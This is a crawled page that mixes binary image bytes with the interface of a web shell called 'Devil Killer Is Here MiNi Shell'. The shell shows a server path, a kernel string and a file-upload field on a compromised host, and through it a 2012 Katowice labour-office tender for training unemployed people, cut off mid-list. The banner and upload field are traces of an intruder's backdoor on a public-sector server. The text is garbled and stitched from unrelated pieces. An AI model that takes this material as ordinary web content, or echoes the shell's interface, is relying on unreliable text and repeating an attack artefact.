JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120305/51697-N-2012.html

<p class="kh_header"><b>Katowice: Zorganizowanie i przeprowadzenie szkoleń osób bezrobotnych</b><br>
<b>Numer ogłoszenia: 51697 - 2012; data zamieszczenia: 05.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Katowicach , ul. Pośpiecha 14, 40-852 Katowice, woj. śląskie, tel. 032 2598263, faks 032 2599503.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pup.katowice.pl/</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń osób bezrobotnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1. 
Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia dla 5 osób bezrobotnych w okresie: 
od 14.05.2012 r. do 29.06.2012 r. 
w godzinach 8.00 - 16.00,
w zakresie specjalności zawodowej: Pracownik sprzedaży z obsługą komputera, kasy fiskalnej i umiejętnością fakturowania.
Część 2. 
Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia dla 5 osób bezrobotnych w okresie: 
od 14.05.2012 r. do 29.06.2012 r. 
w godzinach 8.00 - 16.00,
w zakresie specjalności zawodowej: Magazynier z uprawnieniami do obsługi wózka widłowego, z obsługą programów magazynowych i umiejętnością fakturowania.
Część 3. 
Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia dla 5 osób bezrobotnych w okresie: 
od 14.05.2012 r. do 29.06.2012 r. 
w godzinach 8.00 - 16.00,
w zakresie specjalności zawodowej: Uprawnienia elektryczne do 1kV..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać aktualny wpis do Rejestru Instytucji Szkoleniowych Wojewódzkiego Urzędu Pracy
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej  Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a. oświadczenie, że Wykonawca posiada aktualne zaświadczenie o wpisie instytucji szkoleniowej do Rejestru Instytucji Szkoleniowej Wojewódzkiego Urzędu Pracy - zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej 2 usługi polegające na przeprowadzeniu szkolenia w zakresie przedmiotu zamówienia lub o tematyce podobnej.
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej  Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości przedmiotu, dat wykonania i odbiorców - zgodnie z załącznikiem nr 9 do SIWZ;
b. dokumenty potwierdzające, że usługi (wykazane w wykazie, o którym mowa powyżej) zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie odpowiednim potencjałem technicznym w celu realizacji zamówienia 
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej,  Wykonawca zobowiązany jest przedłożyć wraz  z ofertą:
a. wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie polegające na przeprowadzeniu szkoleń w zakresie przedmiotu zamówienia lub o tematyce podobnej, w okresie ostatnich 3 lat.
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej. Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (wystarczające będzie wykazanie wyłącznie osób, o których mowa powyżej w pkt 2.3.1), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z załącznikiem nr 8 do SIWZ;
Zamawiający na etapie realizacji zamówienia dopuszcza możliwość zmiany kadry realizującej przedmiot zamówienia wyłącznie w sytuacjach losowych niezależnych od wykonawcy pod warunkiem:
- powiadomienia Zamawiającego o zamiarze zmiany
- podania powodów zmiany
- zaproponowania osób, których kwalifikacje zawodowe, doświadczenie i wykształcenie odpowiadać będą kwalifikacjom zawodowym, doświadczeniu i wykształceniu osób podanych w wykazie zgodnie z załącznikiem nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy wraz z oświadczeniem Wykonawcy, że zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń-zgodnie z załącznikiem nr 1 do SIWZ,
2. Program szkolenia dostosowany zakresem do identyfikowanego na rynku pracy zapotrzebowania na kwalifikacje - załącznik nr 4,
3. Kalkulację kosztów - załącznik nr 5,
4. Harmonogram szkolenia - załącznik nr 6,
5. Dokument potwierdzający prawo dysponowania lokalem, w przypadku gdy szkolenie odbywa się poza siedzibą ośrodka szkoleniowego,
6. Wzór zaświadczenia i ewentualnie innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji zawierający:
- numer z rejestru,
- imię i nazwisko oraz nr pesel uczestnika szkolenia,w przypadku cudzoziemca nr dokumentu stwierdzającego tożsamość,
- nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
- formę i nazwę szkolenia,
- okres trwania szkolenia,
- miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji,
- tematy i wymiar godzin zajęć edukacyjnych,
- podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
7. w przypadku Wykonawców działających wspólnie ubiegających się o zamówienie - dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia publicznego albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
8. Certyfikat jakości usług, (jeżeli Wykonawca posiada). Certyfikat jakości usług może dotyczyć zarówno kierunku szkolenia, na które Wykonawca złoży ofertę, jak również Wykonawcy, jako instytucji szkoleniowej świadczącej usługi szkoleniowe. Wśród certyfikatów przedstawianych mogą się znaleźć np: certyfikat zarządzania jakością kształcenia/szkolenia, wydany na podstawie międzynarodowych norm ISO, standard HACCP, certyfikat dla szkół językowych PASE lub inny znak jakości, akredytacje Kuratora Oświaty itd.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Doświadczenie ośrodka szkoleniowego - 20</li>
<li>3 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 20</li>
<li>4 - Zaplecze dydaktyczno - techniczne - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości zmiany istotnych postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w sytuacjach opisanych w rozdziale V pkt 2.3.1 niniejszej SIWZ tj. Zamawiający na etapie realizacji zamówienia dopuszcza możliwość zmiany kadry realizującej przedmiot zamówienia wyłącznie w sytuacjach losowych niezależnych od wykonawcy pod warunkiem:
- powiadomienia Zamawiającego o zamiarze zmiany
- podania powodów zmiany
- zaproponowania osób, których kwalifikacje zawodowe, doświadczenie i wykształcenie odpowiadać będą kwalifikacjom zawodowym, doświadczeniu i wykształceniu osób podanych w wykazie zgodnie z załącznikiem nr 8 do SIWZ oraz w pkt 18 i 19 wzoru umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.katowice.ibip.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy ul. Pośpiecha 14 40-852 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2012 godzina 12:00, miejsce: Powiatowy Urząd Pracy ul. Pośpiecha 14 40-852 Katowice BIURO PODAWCZE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pracownik sprzedaży z obsługą komputera, kasy fiskalnej i umiejętnością fakturowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia dla 5 osób bezrobotnych w okresie: 
od 14.05.2012 r. do 29.06.2012 r. 
w godzinach 8.00 - 16.00,
w zakresie specjalności zawodowej: Pracownik sprzedaży z obsługą komputera, kasy fiskalnej i umiejętnością fakturowania.

Organizacja i przeprowadzenie szkolenia odbędzie się w formie kursu, realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu.

Zamówienie będzie realizowane w grupie 5 osobowej. Będą to osoby skierowane przez urząd, posiadające wykształcenie min. zawodowe i bez przeciwwskazań zdrowotnych do szkolenia. 

Zakres zamówienia obejmuje:
- plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar - 120 godzin zajęć edukacyjnych/lekcyjnych, z uwzględnieniem części teoretycznej i praktycznej,
- plan nauczania obejmujący nie mniej niż 25 godzin zegarowych w tygodniu; godzina zegarowa szkolenia liczy 60 minut i obejmuje zajęcia edukacyjne oraz przerwę między zajęciami; długość przerw może być ustalana w sposób elastyczny,
- wykłady i ćwiczenia, w tym:
a. przepisy BHP i p.poż, zasady GMP, GHP, system HACCP
b. zasady profesjonalnej obsługi klienta (zasady negocjacji - komunikacja bezpośrednia i telefoniczna)
c. nowoczesne techniki sprzedaży (sprzedaż akwizycyjna, sieciowa, telefoniczna, internetowa, marketing i reklama w handlu detalicznym)
d. dokumentacja obrotu towarowego
e. zasady prowadzenia rozliczeń finansowych, fakturowanie
f. organizacja gospodarki magazynowej
g. obsługa kas fiskalnych
i. obsługa komputera z programem sprzedażowym
j. cele i zasady prowadzenia inwentaryzacji 
k. aktywne metody poszukiwania pracy,
- materiały szkoleniowe,
- egzamin końcowy,
- zaświadczenie i ewentualnie inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji,
- koszty zakwaterowania i wyżywienia, jeżeli szkolenie odbywa się poza miejscem zamieszkania bezrobotnego (tj. poza Katowicami), w miejscowości, do której czas dojazdu i powrotu do miejsca stałego zamieszkania wynosi łącznie ponad 3 godziny dziennie,
- koszty wynajmu sal, jeżeli szkolenie odbywa się poza siedzibą ośrodka (dokument potwierdzający prawo dysponowania lokalem),
- inne, zgodnie z przyjętym kwestionariuszem szkolenia.

Zakres zamówienia nie obejmuje: ubezpieczenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem, kosztów przejazdu na szkolenie oraz badań lekarskich i psychologicznych wymaganych w przepisach odrębnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie ośrodka szkoleniowego - 20</li>
<li>3. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 20</li>
<li>4. Zaplecze dydaktyczno - techniczne - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Magazynier z uprawnieniami do obsługi wózka widłowego, z obsługą programów magazynowych i umiejętnością fakturowania..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia dla 5 osób bezrobotnych w okresie: 
od 14.05.2012 r. do 29.06.2012 r. 
w godzinach 8.00 - 16.00,
w zakresie specjalności zawodowej: Magazynier z uprawnieniami do obsługi wózka widłowego, z obsługą programów magazynowych i umiejętnością fakturowania.

Organizacja i przeprowadzenie szkolenia odbędzie się w formie kursu, realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu.

Zamówienie będzie realizowane w grupie 5 osobowej. Będą to osoby skierowane przez urząd, posiadające wykształcenie min. średnie, posiadające umiejętność obsługi komputera i bez przeciwwskazań zdrowotnych do szkolenia. 

Zakres zamówienia obejmuje:
